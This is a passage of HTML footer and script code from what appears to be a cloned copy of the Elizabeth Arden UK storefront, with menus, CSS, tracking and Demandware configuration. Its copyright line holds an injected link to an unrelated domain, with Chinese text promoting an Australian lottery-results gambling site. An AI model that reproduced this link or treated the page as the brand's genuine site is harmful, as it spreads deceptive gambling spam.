  4605. <div class="footer-item footer-responsivecallcenter hide-desktop">
  4606. <div class="content-asset">
  4607. <p class="mobile-contact">Email us: <u><a href="mailto:service-uk@service.elizabetharden.com">service-uk@service.elizabetharden.com</a></u></p>
  4608. </div>
  4609. </div>
  4610. <div class="footer-item footer-socialmedia">
  4611. <div class="content-asset">
  4612. <div class="footer-items">Follow Us</div>
  4613. <div class="social-links">
  4614. <a class="facebookicon" alt="Facebook" href="https://www.facebook.com/elizabethardenUK" aria-label="link to Elizabeth Arden on Facebook" target="_blank"><i class="fa fa-facebook"></i></a>
  4615. <a class="twittericon" alt="Twitter" href="https://twitter.com/ardenuk" aria-label="link to Elizabeth Arden on Twitter" target="_blank"><i class="fa fa-twitter"></i></a>
  4616. <a class="youtube" alt="youtube" href="https://www.youtube.com/user/ElizabethArdenBeauty" aria-label="link to Elizabeth Arden on YouTube" target="_blank"><i class="fa fa-youtube-play"></i></a>
  4617. <a class="instagram" alt="camara" href="https://instagram.com/elizabetharden" aria-label="link to Elizabeth Arden on Instagram" target="_blank"><i class="fa fa-instagram"></i></a>
  4618. </div>
  4619. <style>
  4620. #footer .footer-container,
  4621. #footer #email-alert-signup input.emailalertbutton,
  4622. .header-banner .header-promotion {background-color: #000;}
  4623. .header-banner .header-promotion, .header-banner .header-promotion a{color: #fff;}
  4624. #BVRRContainer .bv-cv2-cleanslate .bv-core-container-256 .bv-content-actions-container{
  4625.    padding: 0 !important;
  4626. }
  4627.  
  4628. .pdp-main #BVRRContainer .bv-cv2-cleanslate div{text-align: left !important;}
  4629.  
  4630. /*-- eight hour dropdown menu --*/
  4631. .menu-category.level-1 > li.eight-hour a span{
  4632.  
  4633. }
  4634. @media screen and (max-width: 1023px){
  4635. #footer .footer-containerlinks .footerlinks .footer-item.footer-socialmedia .social-links a:last-child{
  4636. float: none;
  4637. }
  4638.  
  4639. @media screen and (max-width: 767px){
  4640. /*[data-bv-show="rating_summary"] .bv_main_container .bv_stars_component_container .bv_stars_button_container, [data-bv-show="rating_summary"] .bv_main_container .bv_main_container_row_flex{padding-right: 0 !important;}*/
  4641. [data-bv-show="rating_summary"] .bv_main_container .bv_main_container_row_flex:last-child{padding-right: 0 !important;}
  4642. [data-bv-show="rating_summary"]{text-align: center !important;}
  4643. [data-bv-show="rating_summary"] .bv_main_container{justify-content: center;}
  4644. #footer .footer-containerlinks .footerlinks .footer-item.footer-socialmedia .social-links a {font-size: 2.2em;}
  4645. }
  4646.  
  4647. @media screen and (max-width:736px){
  4648. #BVRRContainer .bv-cv2-cleanslate [class*="bv-core-container-"] .bv-write-review-container,
  4649. #BVRRContainer .bv-cv2-cleanslate [class*="bv-core-container-"] .bv-write-review-container{float: none !important; margin-left: 0% !important;}
  4650. #BVRRContainer .bv-cv2-cleanslate [class*="bv-core-container-"] .bv-action-bar button{margin-top: 13% !important;}
  4651. #BVRRContainer .bv-cv2-cleanslate [class*="bv-core-container-"] .bv-action-bar{padding-bottom: 5px !important;}
  4652. }
  4653.  
  4654. @media screen and (max-width:767px){
  4655. .pdp-main #BVRRContainer .bv-cv2-cleanslate div{text-align:left !important;}
  4656. .pdp-main #BVRRSummaryContainer {display:block !important;}
  4657. .pdp-main #BVRRSummaryContainer .bv-cv2-cleanslate,
  4658. .pdp-main #BVRRSummaryContainer .bv-cv2-cleanslate div{display:block !important; text-align: center !important;}
  4659. }
  4660. </style>
  4661. </div>
  4662. </div>
  4663. <div class="footertermsprivacy">
  4664. <div class="countryselect">
  4665. <div class="content-asset">
  4666. <p><select class="country-store custom-select">
  4667. <option value="https://www.elizabetharden.com.au/">Australia</option>
  4668. <option value="https://www.elizabetharden.at/">Austria</option>
  4669. <option value="https://canada.elizabetharden.com/">Canada</option>
  4670. <option value="https://www.elizabetharden.hk/">China, Hong Kong SAR</option>
  4671. <option value="https://china.elizabetharden.com/">China, Shanghai</option>
  4672. <option value="https://www.elizabetharden.tw/">China, Taiwan, Taipei</option>
  4673. <option value="https://www.elizabetharden.dk/">Denmark</option>
  4674. <option value="https://elizabetharden.fr/">France</option>
  4675. <option value="https://www.elizabetharden.de/">Germany</option>
  4676. <option value="https://www.elizabetharden.it/">Italy</option>
  4677. <option value="https://www.elizabetharden.co.kr/">Korea</option>
  4678. <option value="https://www.elizabetharden.co.nz/">New Zealand</option>
  4679. <option value="https://www.elizabetharden.no/">Norway</option>
  4680. <option value="https://www.elizabetharden.sg/">Singapore</option>
  4681. <option value="https://www.elizabetharden.co.za/">South Africa</option>
  4682. <option value="https://www.elizabetharden.com.es/">Spain</option>
  4683. <option value="https://www.elizabetharden.com/">United States</option>
  4684. <option value="https://www.elizabetharden.co.uk/" selected="selected">United Kingdom</option> </select></p>
  4685. <style type="text/css">#footer .emailsignup{
  4686.    font-size: 13px;
  4687. }
  4688. </style>
  4689. </div>
  4690. </div>
  4691. <div class="footer-responsivelinks hide-desktop">
  4692. <div class="content-asset">
  4693. <ul class="menu-footer menu pipe footermob hide-tablet">
  4694. <li><a href="contact-us.html" title="Go to Contact Us">Contact Us</a></li>
  4695. <li><a href="index-98.html" title="Go to Customer Service">Customer Service</a></li>
  4696. <li><a href="student-discount.html" title="Student Discount">Student Discount</a></li>
  4697. <li><a href="key-worker-discount.html" title="Key Worker Discount">Key Worker Discount</a></li>
  4698. <li><a href="terms-of-sale.html" title="Go to Terms Of Sale">Terms Of Sale</a></li>
  4699. <li><a href="terms.html" title="Go to Terms Of Use">Terms Of Use</a></li>
  4700. <li><a href="privacy-and-policy.html" title="Go to Privacy Policy">Privacy Policy</a></li>
  4701. <li><a href="cookie-policy.html" title="Go to Cookie Policy">Cookie Policy</a></li>
  4702. <li><a href="https://www.thereddoor.com/" target="_blank" title="Go to The Red Door">The Red Door</a></li>
  4703. <li><a class="store-loc-com" href="index-101.html" title="Go to Locate a Store">Locate a Store</a></li>
  4704. </ul>
  4705. <ul class="menu-footer menu pipe footertab hide-mobile">
  4706. <li><a href="contact-us.html" title="Go to Contact Us">Contact Us</a></li>
  4707. <li><a href="index-99.html" title="Go to My Account">My Account</a></li>
  4708. <li><a class="store-loc-com" href="index-101.html" title="Go to Locate a Store">Locate a Store</a></li>
  4709. <li><a href="faq.html" title="Go to FAQs">FAQs</a></li>
  4710. <li><a href="index-103.html" title="Go to Order Status">Order Status</a></li>
  4711. <li><a href="https://www.thereddoor.com/" target="_blank" title="Go to The Red Door">The Red Door</a></li>
  4712. <li><a href="terms-of-sale.html" title="Go to Terms Of Sale">Terms Of Sale</a></li>
  4713. <li><a href="shipping-option-cost.html" title="Go to Shipping &amp; Delivery">Shipping &amp; Delivery</a></li>
  4714. <li><a href="https://corporate.elizabetharden.com/human-resources" title="Go to Careers">Careers</a></li>
  4715. <li><a href="index-104.html" title="Go to Wish List">Wish List</a></li>
  4716. <li><a href="return-instruction.html" title="Go to Returns &amp; Exchanges">Returns &amp; Exchanges</a></li>
  4717. <li><a href="student-discount.html" title="Student Discount">Student Discount</a></li>
  4718. <li><a href="key-worker-discount.html" title="Key Worker Discount">Key Worker Discount</a></li>
  4719. <li><a href="https://corporate.elizabetharden.com/" title="Go to Corporate Info">Corporate Info</a></li>
  4720. <li><a href="privacy-policy.html" title="Go to Privacy Policy">Privacy Policy</a></li>
  4721.  
  4722. </ul>
  4723. </div>
  4724. </div>
  4725. <div class="content-asset">
  4726.  
  4727. <div class="copyrightnew">
  4728. <a href="terms-of-sale.html" title="Terms of Sale" value="Terms of Sale">Terms of Sale</a>
  4729. |
  4730. <a href="terms.html" title="Terms of Use">Terms of Use</a> |
  4731. <a href="privacy-and-policy.html" title="Privacy Policy">Privacy Policy</a> |
  4732. <a href="exercise-privacy-rights.html" title="Data Subject Access Request">Exercise Your
  4733. Privacy Rights</a> |
  4734. <a href="cookie-policy.html" title="Cookie Policy">Cookie Policy</a><br/>
  4735. <a href="pdf/elizabeth-arden-2022-modern_slavery_act_statement.pdf" target="_blank" title="UK Modern Slavery Act 2022">UK Modern Slavery Act 2022</a>, <a href="pdf/elizabeth-arden-2021-modern-slavery-statement.pdf" target="_blank" title="UK Modern Slavery Act 2021">2021</a> |
  4736. <a href="web-accessibility.html" title="Web Accessibility">Web Accessibility</a><br/>
  4737. &copy;<script type="text/javascript">
  4738. var theDate=new Date()
  4739. document.write(theDate.getFullYear())
  4740. </script> <a href="index.html" target="_blank">radiantfusedantiagingcream.net 澳洲幸运10最新开奖结果号码官方网站 </a>Elizabeth Arden UK LTD. All Rights Reserve.
  4741. </div>
  4742.  
  4743.  
  4744. <script>
  4745.    jQuery(document).ready(function () {
  4746.        var royalWarrantLogo = 'svg/royal-warrant.svg';
  4747.        var royalWarrantText = 'BY APPOINTMENT TO HER MAJESTY THE QUEEN MANUFACTURERS OF COSMETICS ELIZABETH ARDEN NEW YORK';
  4748.        jQuery('.primary-logo').prepend('<div class="royal-warrant-wrapper"><img class="royal-warrant-logo" src="' + royalWarrantLogo + '" alt="' + royalWarrantText + '" /><div class="royal-warrant-text">' + royalWarrantText + '</div></div>');
  4749.    });
  4750. </script>
  4751.  
  4752. <style type="text/css">
  4753.    .copyrightnew {
  4754.        margin: .5;
  4755.        text-align: right;
  4756.    }
  4757.  
  4758.    .copyrightnew a {
  4759.        text-decoration: underline;
  4760.        color: #FFFFFF;
  4761.    }
  4762.  
  4763.    .pdp-main .product-info ul li {
  4764.        list-style: circle;
  4765.    }
  4766.  
  4767.    .pdp-main .product-info ul {
  4768.        margin-left: 30px;
  4769.        padding-left: 0;
  4770.        padding-right: 0;
  4771.        font-size: 15px;
  4772.    }
  4773.  
  4774.    /* .menu-category.level-1 li.gifts a.has-sub-level span {
  4775.        color: #c41726;
  4776.        font-weight: 500;
  4777.    } */
  4778.  
  4779.    .menu-category.level-1 li.sale a span {
  4780.        color: #c41726;
  4781.        font-weight: 500;
  4782.    }
  4783.  
  4784.    @media screen and (max-width: 1023px) {
  4785.        .copyrightnew {
  4786.            text-align: center;
  4787.        }
  4788.    }
  4789.  
  4790.    /* royal warrant START */
  4791.  
  4792.    @media screen and (min-width: 1024px) {
  4793.        .primary-logo {
  4794.            width: calc(100% - 62px);
  4795.        }
  4796.  
  4797.        .primary-logo a {
  4798.            margin-left: 0 !important;
  4799.            margin-right: 0 !important;
  4800.            width: calc(100% - 325px);
  4801.        }
  4802.  
  4803.        .royal-warrant-wrapper {
  4804.            float: left;
  4805.        }
  4806.  
  4807.        .royal-warrant-logo {
  4808.            height: 45px;
  4809.        }
  4810.  
  4811.        .royal-warrant-text {
  4812.            float: right;
  4813.            max-width: 125px;
  4814.            font-size: 7px;
  4815.            text-align: left;
  4816.            padding-left: 8px;
  4817.            padding-top: 5px;
  4818.        }
  4819.    }
  4820.  
  4821.    @media screen and (min-width: 768px) and (max-width: 1023px) {
  4822.        .royal-warrant-wrapper {
  4823.            display: none !important;
  4824.        }
  4825.    }
  4826.  
  4827.    @media screen and (max-width: 767px) {
  4828.        .royal-warrant-wrapper {
  4829.            display: none !important;
  4830.        }
  4831.    }
  4832.  
  4833.    /* royal warrant END */
  4834. </style>
  4835.  
  4836. </div>
  4837. </div>
  4838. </div>
  4839. </div>
  4840. </footer>
  4841. </div>
  4842.  
  4843. <script type="text/javascript">
  4844. /* <![CDATA[ */
  4845. var google_conversion_id = 1036670823;
  4846. var google_conversion_language = "en";
  4847. var google_conversion_format = "3";
  4848. var google_conversion_color = "666666";
  4849. var google_conversion_label = "54exCJuQrQEQ566p7gM";
  4850. var google_conversion_value = 0;
  4851. /* ]]> */
  4852. </script>
  4853. <script type="text/javascript" src="txt/f.txt">
  4854. </script>
  4855. <noscript>
  4856. <div style="display:inline;">
  4857. <img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1036670823/?label=54exCJuQrQEQ566p7gM&amp;guid=ON&amp;script=0"/>
  4858. </div>
  4859. </noscript>
  4860. <!--[if lte IE 8]>
  4861. <script src="//cdn.rawgit.com/weblinc/media-match/master/media.match.min.js" type="text/javascript"></script>
  4862. <script src="//cdnjs.cloudflare.com/ajax/libs/es5-shim/3.4.0/es5-shim.min.js"></script>
  4863. <![endif]-->
  4864. <!--[if IE 9]>
  4865. <script src="//cdn.rawgit.com/paulirish/matchMedia.js/master/matchMedia.js" type="text/javascript"></script>
  4866. <script src="//cdn.rawgit.com/paulirish/matchMedia.js/master/matchMedia.addListener.js" type="text/javascript"></script>
  4867. <![endif]-->
  4868. <script type="text/javascript">
  4869. /** Browser version checking for IE Broswer Issue*/
  4870. var onEscapeFlag=true;
  4871. if(navigator.appName.indexOf("Internet Explorer") != -1) {
  4872. var badBrowserVersion=(
  4873. navigator.appVersion.indexOf("MSIE 9")!=-1 ||
  4874. navigator.appVersion.indexOf("MSIE 8")!=-1 ||
  4875. navigator.appVersion.indexOf("MSIE 7")!=-1 ||
  4876. navigator.appVersion.indexOf("MSIE 6")!=-1 ||
  4877. navigator.appVersion.indexOf("MSIE 5")!=-1 ||
  4878. navigator.appVersion.indexOf("MSIE 4")!=-1 ||
  4879. navigator.appVersion.indexOf("MSIE 3")!=-1 ||
  4880. navigator.appVersion.indexOf("MSIE 2")!=-1 ||
  4881. navigator.appVersion.indexOf("MSIE 1")!=-1
  4882. );
  4883. if(badBrowserVersion){
  4884. if(badBrowserVersion){
  4885. if(navigator.appVersion.indexOf("MSIE 10") == 17){
  4886. $('.browsercontainer').addClass('hide');
  4887. $('.browsercontainer').closest('body').css('overflow','visible');
  4888. }else{
  4889. $('.browsercontainer').removeClass('hide');
  4890. $('.signup-dialog').css('z-index','10');
  4891. $('#dwfrm_emailsignup_email').attr('disabled','true');
  4892. $('.browsercontainer').closest('body').css('overflow','hidden');
  4893. $('.browsercontainer').height($(window).height());
  4894. onEscapeFlag = false;
  4895. }
  4896. }
  4897. }
  4898. }
  4899. </script>
  4900. <script type="text/javascript">
  4901.  
  4902. (function(){
  4903. window.Constants = {"AVAIL_STATUS_IN_STOCK":"IN_STOCK","AVAIL_STATUS_PREORDER":"PREORDER","AVAIL_STATUS_BACKORDER":"BACKORDER","AVAIL_STATUS_NOT_AVAILABLE":"NOT_AVAILABLE"};
  4904. window.Resources = {"I_AGREE":"I Agree","CLOSE":"Close","NO_THANKS":"No, thanks","OK":"OK","ARE_YOU_HUMAN":"Are you a Human Being?","SHIP_QualifiesFor":"This shipment qualifies for","CC_LOAD_ERROR":"Couldn't load credit card!","REG_ADDR_ERROR":"Could Not Load Address","BONUS_PRODUCT":"Bonus Product","BONUS_PRODUCTS":"Bonus Products","SELECT_BONUS_PRODUCTS":"Select Bonus Products","SELECT_BONUS_PRODUCT":"product.selectbonusproduct","BONUS_PRODUCT_MAX":"The maximum number of bonus products has been selected. Please remove one in order to add additional bonus products.","BONUS_PRODUCT_TOOMANY":"You have selected too many bonus products. Please change the quantity.","SIMPLE_SEARCH":"Search","SUBSCRIBE_EMAIL_DEFAULT":"Email Address","CURRENCY_SYMBOL":"£","MISSINGVAL":"Please enter {0}","SERVER_ERROR":"Server connection failed!","MISSING_LIB":"jQuery is undefined.","BAD_RESPONSE":"Bad response - parser error!","INVALID_PHONE":"Please specify a valid phone number.","INVALID_COUNTRY":"This field is required.","REMOVE":"Remove","QTY":"Qty","EMPTY_IMG_ALT":"Remove","COMPARE_BUTTON_LABEL":"Compare Items","COMPARE_CONFIRMATION":"This will remove the first product added for comparison. Is that OK?","COMPARE_REMOVE_FAIL":"Unable to remove item from list","COMPARE_ADD_FAIL":"Unable to add item to list","ADD_TO_CART_FAIL":"Unable to add item '{0}' to cart","REGISTRY_SEARCH_ADVANCED_CLOSE":"Close Advanced Search","GIFT_CERT_INVALID":"Invalid gift certificate code.","GIFT_CERT_BALANCE":"Your current gift certificate balance is","GIFT_CERT_AMOUNT_INVALID":"Gift Certificate can only be purchased with a minimum of 5 and maximum of 5000","GIFT_CERT_MISSING":"Please enter a gift certificate code.","INVALID_OWNER":"This appears to be a credit card number. Please enter the name of the card holder.","COUPON_CODE_MISSING":"Please enter a coupon code.","COOKIES_DISABLED":"Your browser is currently not set to accept cookies. Please turn this functionality on or check if you have another program set to block cookies.","BML_AGREE_TO_TERMS":"You must agree to the terms and conditions","CHAR_LIMIT_MSG":"You have {0} characters left out of {1}","CONFIRM_DELETE":"Do you want to remove this {0}?","CONFIRM_DELETE_CREDITCARD":"confirm.delete.creditcard","TITLE_GIFTREGISTRY":"gift registry","TITLE_ADDRESS":"address","TITLE_CREDITCARD":"credit card","SERVER_CONNECTION_ERROR":"Server connection failed!","IN_STOCK_DATE":"Expected ship date {0}.","ITEM_STATUS_NOTAVAILABLE":"This item is currently not available.","INIFINITESCROLL":"Show All","STORE_NEAR_YOU":"What's available at a store near you","SELECT_STORE":"Select Store","SELECTED_STORE":"Selected Store","PREFERRED_STORE":"Preferred Store","SET_PREFERRED_STORE":"Set Preferred Store","ENTER_ZIP":"Enter Postal Code","INVALID_ZIP":"Please enter a valid Post Code","SEARCH":"Search","CHANGE_LOCATION":"Change Location","CONTINUE_WITH_STORE":"Continue with preferred store","CONTINUE":"Continue","SEE_MORE":"See More Stores","SEE_LESS":"See Fewer Stores","QUICK_VIEW":"QUICKSHOP","QUICK_VIEW_POPUP":"Product Quick View","TLS_WARNING":"We value your security!<br/>We detected that you are using an outdated browser.<br/>Update you browser to continue a secure shopping experience.","VALIDATE_REQUIRED":"This field is required.","VALIDATE_REMOTE":"Please fix this field.","VALIDATE_EMAIL":"Please enter a valid email address.","VALIDATE_FOOTER_ERROR":"Please check the box to agree with our privacy policy.","VALIDATE_PRIVACY":"Please check the box to agree with our privacy policy.","VALIDATE_EMAILEXISTED":"entered email address already exists.","VALIDATE_URL":"Please enter a valid URL.","VALIDATE_DATE":"Please enter a valid date.","VALIDATE_DATEISO":"Please enter a valid date ( ISO ).","VALIDATE_NUMBER":"Please enter a valid number.","VALIDATE_DIGITS":"Please enter only digits.","VALIDATE_CREDITCARD":"Please enter a valid credit card number.","VALIDATE_EQUALTO":"Please enter the same value again.","VALIDATE_MAXLENGTH":"Please enter no more than {0} characters.","VALIDATE_MINLENGTH":"Please enter at least {0} characters.","VALIDATE_RANGELENGTH":"Please enter a value between {0} and {1} characters long.","VALIDATE_RANGE":"Please enter a value between {0} and {1}.","VALIDATE_MAX":"Please enter a value less than or equal to {0}.","VALIDATE_MIN":"Please enter a value greater than or equal to {0}.","VALIDATE_QTYMAX":"Please enter a value less than or equal to","VALIDATE_QTYMIN":"Please enter a value greater than or equal to 1.","STORE_ZIP":"Your Post Code or City","CHANGE_DATE_PICKER":"Change Ship Date","INVALID_CVN":"Invalid Security Code","NO_SEARCH_RESULTS":"Sorry, but we couldn't find any results for your search","INVALID_INPUT":"Please enter Valid Post Code or City","ITEMS_ADDED_TEXT_MOBILE":"Items added to your bag","ADYEN_CC_VALIDATE":"Please enter a valid credit card information.","IN_STOCK":"In Stock","QTY_IN_STOCK":"{0} Item(s) in Stock","PREORDER":"Pre-Order item.","QTY_PREORDER":"{0} item(s) are available for pre-order.","REMAIN_PREORDER":"The remaining items are available for pre-order.","BACKORDER":"Back Order item.","QTY_BACKORDER":"Back order {0} item(s)","REMAIN_BACKORDER":"The remaining items are available on back order.","NOT_AVAILABLE":"This item is currently not available.","REMAIN_NOT_AVAILABLE":"The remaining items are currently not available. Please adjust the quantity."};
  4905. window.Urls = {"appResources":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Resources-Load","pageInclude":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Page-Include","pageShow":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Page-Show","continueUrl":"https://www.elizabetharden.co.uk/","staticPath":"/on/demandware.static/Sites-ElizabethArdenUK-Site/-/en_GB/v1697774803777/","addGiftCert":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/GiftCert-Purchase","minicartGC":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/GiftCert-ShowMiniCart","addProduct":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-AddProduct","addAllDTSProducts":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-AddAllDTSToCart","minicart":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-MiniAddProduct","cartShow":"/my-cart/","giftRegAdd":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Address-GetAddressDetails?addressID=","paymentsList":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/PaymentInstruments-List","addressesList":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Address-List","wishlistAddress":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Wishlist-SetShippingAddress","deleteAddress":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Address-Delete","getProductUrl":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-Show","getBonusProducts":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-GetBonusProducts","addBonusProduct":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-AddBonusProduct","getSetItem":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-GetSetItem","productDetail":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-Detail","getAvailability":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-GetAvailability","removeImg":"/on/demandware.static/Sites-ElizabethArdenUK-Site/-/default/dw736d4f89/images/icon_remove.gif","searchsuggest":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Search-GetSuggestions","productNav":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-Productnav","summaryRefreshURL":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-UpdateSummary","billingSelectCC":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-SelectCreditCard","updateAddressDetails":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COShipping-UpdateAddressDetails","updateAddressDetailsBilling":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-UpdateAddressDetails","shippingMethodsJSON":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COShipping-GetApplicableShippingMethodsJSON","shippingMethodsList":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COShipping-UpdateShippingMethodList","selectShippingMethodsList":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COShipping-SelectShippingMethod","resetPaymentForms":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-ResetPaymentForms","compareShow":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Compare-Show","compareAdd":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Compare-AddProduct","compareRemove":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Compare-RemoveProduct","compareEmptyImage":"/on/demandware.static/Sites-ElizabethArdenUK-Site/-/default/dwafc48fbd/images/comparewidgetempty.png","giftCardCheckBalance":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-GetGiftCertificateBalance","redeemGiftCert":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-RedeemGiftCertificateJson","addCoupon":"https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-AddCouponJson","storesInventory":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/StoreInventory-Inventory","setPreferredStore":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/StoreInventory-SetPreferredStore","getPreferredStore":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/StoreInventory-GetPreferredStore","setStorePickup":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/StoreInventory-SetStore","setZipCode":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/StoreInventory-SetZipCode","getZipCode":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/StoreInventory-GetZipCode","billing":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-Start","setSessionCurrency":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Currency-SetSessionCurrency","addEditAddress":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COShippingMultiple-AddEditAddressJSON","cookieHint":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Page-Include?cid=cookie_hint","rateLimiterReset":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/RateLimiter-HideCaptcha","footeremailsignup":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/ExactTargetEmailSignUp-Footer","zoomImageProduct":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Product-GetZoomImage","updateLineValue":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Subscriptions-UpdateLineValue","submitCoupon":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-SubmitForm","diagnosticskinresults":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/DiagnosticsTool-SkinCareResults","diagnosticsaveresults":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/DiagnosticsTool-SaveResults","getStates":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-GetStates","updateState":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-UpdateState","findbyZipCity":"/stores/","updateYear":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/COBilling-UpdateYear","storesFind":"/locations/","giftBoxProduct":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-GiftboxProduct","removeGiftWrap":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cart-RemoveGiftWrap","cookielaw":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Cookie-Law","clearcartinternational":"/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/ClearCartInternational-AbandonInternationalCart"};
  4906. window.SitePreferences = {"LISTING_INFINITE_SCROLL":true,"LISTING_REFINE_SORT":true,"STORE_PICKUP":false,"COOKIE_HINT":false,"CHECK_TLS":false,"ADYEN_SF_ENABLED":true,"AFTERPAY_PORTAL":"https://portal.afterpay.com/afterpay.js","AFTERPAY_MIN_AMOUNT":1,"AFTERPAY_ENABLE":null,"ENABLE_FINDATION":true,"ENABLE_AGILE_ONE":null};
  4907. //PREVAIL-Window Properties
  4908. window.isSPCEnabled = false;
  4909. window.isCyberSourceEnabled = false;
  4910. window.isAVSEnabled = true;
  4911. window.isEventTrackingEnabled = false;
  4912. window.isGoogleAnalyticsEnabled = false;
  4913. window.isGTMEnabled = true;
  4914. window.isEmailSubscriptionEnabled = false;
  4915. window.isBISNEnabled = null;
  4916. window.ACCEPT_COOKIES = false;
  4917. window.COOKIE_EXPIRATION = 14;
  4918. }());
  4919. </script>
  4920. <script type="text/javascript">
  4921.  
  4922. (function(){
  4923. window.SessionAttributes = {"SHOW_CAPTCHA":null};
  4924. window.User = {"zip":null,"storeId":null};
  4925. }());
  4926. </script>
  4927. <script src="js/jquery-ui.min.js" type="text/javascript"></script>
  4928. <script src="js/jquery.jcarousel.min.js" type="text/javascript"></script>
  4929. <script src="js/jquery.validate.min.js" type="text/javascript"></script>
  4930. <script src="js/jquery.cookie.js" type="text/javascript"></script>
  4931. <script src="js/jquery.zoom.min.js" type="text/javascript"></script>
  4932. <script src="js/underscore.js" type="text/javascript"></script>
  4933. <script src="js/slick.js" type="text/javascript"></script>
  4934. <script src="js/jquery.selectbox-0.2.js" type="text/javascript"></script>
  4935. <script src="js/pinchzoom.js" type="text/javascript"></script>
  4936. <script src="js/modernizr.js" type="text/javascript"></script>
  4937. <script src="js/app.js" type="text/javascript"></script>
  4938. <script>pageContext = {"title":"Storefront","type":"storefront","ns":"storefront"};</script>
  4939. <script>
  4940. var meta = "Elizabeth Arden UK is recognized worldwide for innovative beauty products, technology driven skin care, trendsetting makeup and distinctive perfumes. Our brands include PREVAGE&reg;, Eight Hour Cream, Ceramide, Visible Difference, Red Door, Green Tea plus more.";
  4941. var keywords = "beauty, beauty products, make up, makeup, skin care, skin care products, facial products, perfume, perfumes, skin products";
  4942. </script>
  4943.  
  4944.  
  4945. </div>
  4946.  
  4947. <script type="text/javascript">//<!--
  4948. /* <![CDATA[ */
  4949. function trackPage() {
  4950.    try{
  4951.        var trackingUrl = "gif/__analytics-start.gif";
  4952.        var dwAnalytics = dw.__dwAnalytics.getTracker(trackingUrl);
  4953.        if (typeof dw.ac == "undefined") {
  4954.            dwAnalytics.trackPageView();
  4955.        } else {
  4956.            dw.ac.setDWAnalytics(dwAnalytics);
  4957.        }
  4958.    }catch(err) {};
  4959. }
  4960. /* ]]> */
  4961. // -->
  4962. </script>
  4963. <script type="text/javascript" src="js/dwanalytics-22.2.js" async="async" onload="trackPage()"></script>
  4964.  
  4965. <script src="js/dwac-21.7.js" type="text/javascript" async="async"></script>
  4966. <script src="js/gretel.min.js" type="text/javascript" async="async"></script>
  4967.  
  4968. <script type="text/javascript">//<!--
  4969. /* <![CDATA[ */
  4970. if (!window.dw) dw = {};
